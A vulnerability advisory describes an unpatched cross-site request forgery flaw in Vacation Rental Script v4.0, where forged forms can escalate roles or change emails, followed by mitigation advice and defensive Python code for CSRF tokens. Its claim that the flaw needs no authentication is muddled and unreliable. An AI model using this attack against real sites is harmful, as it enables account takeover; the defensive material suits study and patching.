Vendor: Vacation Rental Script
By: OnurTURKESHAN
CVSS: 8.8 (HIGH)
CWE: 352, Cross-Site Request Forgery (XSRF)
Product Name: Vacation Rental Script
Affected Version From: v4.0
Affected Version To: v4.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Tested +WorKs
2010
Vacation Rental Script v4.0 XSRF VULNERABILITY
Vacation Rental Script v4.0 is vulnerable to Cross-Site Request Forgery (XSRF) attacks. An attacker can craft a malicious HTML form and submit it to the vulnerable application. This form can contain hidden fields that can be used to modify the application state, such as changing the user role to 'admin' or changing the user's email address. This vulnerability can be exploited without authentication.
Mitigation:
The application should use a CSRF token to verify that the request is coming from a trusted source. The application should also validate all user input to prevent malicious data from being submitted.
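
One way to implement the CSRF token check recommended above, as an added example that is not code from Vacation Rental Script or from the original advisory. The function names, the session identifiers and the server-side secret are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets
import string

# Assumption: a per-deployment secret that never leaves the server.
SERVER_SECRET = secrets.token_bytes(32)
NONCE_HEX_LEN = 32


def _mac(session_id: str, nonce: str) -> str:
    msg = f"{session_id}:{nonce}".encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()


def issue_csrf_token(session_id: str) -> str:
    """Return a token bound to one session, for a hidden form field."""
    nonce = secrets.token_hex(NONCE_HEX_LEN // 2)
    return f"{nonce}.{_mac(session_id, nonce)}"


def verify_csrf_token(session_id: str, token) -> bool:
    """True only if this server issued the token for this session."""
    if not isinstance(token, str) or token.count(".") != 1:
        return False
    nonce, sent_mac = token.split(".")
    # Reject nonces the server could not have generated.
    if len(nonce) != NONCE_HEX_LEN or any(c not in string.hexdigits for c in nonce):
        return False
    expected = _mac(session_id, nonce)
    # Constant-time comparison avoids leaking how many characters matched.
    return hmac.compare_digest(expected.encode(), sent_mac.encode())


def handle_profile_update(session_id: str, form: dict) -> tuple:
    """Hypothetical state-changing handler (e.g. an e-mail change)."""
    if not verify_csrf_token(session_id, form.get("csrf_token", "")):
        return (403, "CSRF token missing or invalid")
    # Reached only when the form carried a token issued to this session.
    return (200, f"email updated to {form['email']}")


if __name__ == "__main__":
    # Constructed sample values, not taken from the product.
    token = issue_csrf_token("session-A")
    print(handle_profile_update("session-A", {"email": "a@example.com", "csrf_token": token}))
    print(handle_profile_update("session-A", {"email": "a@example.com"}))
    print(handle_profile_update("session-B", {"email": "a@example.com", "csrf_token": token}))
```

A form submitted from another site cannot read the token from the legitimate page, so it fails the check and the state change is refused.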